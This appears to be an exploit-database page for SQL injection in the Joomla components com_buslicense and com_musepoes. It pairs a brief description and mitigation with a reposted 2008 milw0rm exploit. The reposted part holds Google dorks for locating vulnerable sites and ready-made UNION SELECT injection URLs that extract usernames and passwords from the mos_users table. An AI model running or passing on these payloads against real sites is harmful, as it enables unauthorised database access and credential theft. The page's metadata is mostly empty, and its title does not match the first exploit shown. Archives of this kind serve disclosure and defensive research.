joomla SQL Injection(com_buslicense)

vendor:

N/A

by:

S@BUN

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

joomla SQL Injection(com_buslicense)

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The crafted request contains malicious SQL statements that are executed in the backend database. This can allow the attacker to access sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_musepoes)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_musepoes"
#
########################################################################
EXPLOIT :

index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*

#########################################################################
# S@BUN                     www.hackturkiye.com               S@BUN #########################################################################
#########################################################################
# S@BUN                         GOOD LUCKY                       S@BUN
#########################################################################


-------------------------------------------------------------------------------------------------------------------------------------------------

#########################################################################
#
# joomla SQL Injection(com_buslicense)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_buslicense"
#
########################################################################
EXPLOIT :

index.php?option=com_buslicense&sectionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/*


#########################################################################
# S@BUN                 www.hackturkiye.com                 S@BUN
#########################################################################
# S@BUN                    GOOD LUCKY                        S@BUN
#########################################################################

# milw0rm.com [2008-01-30]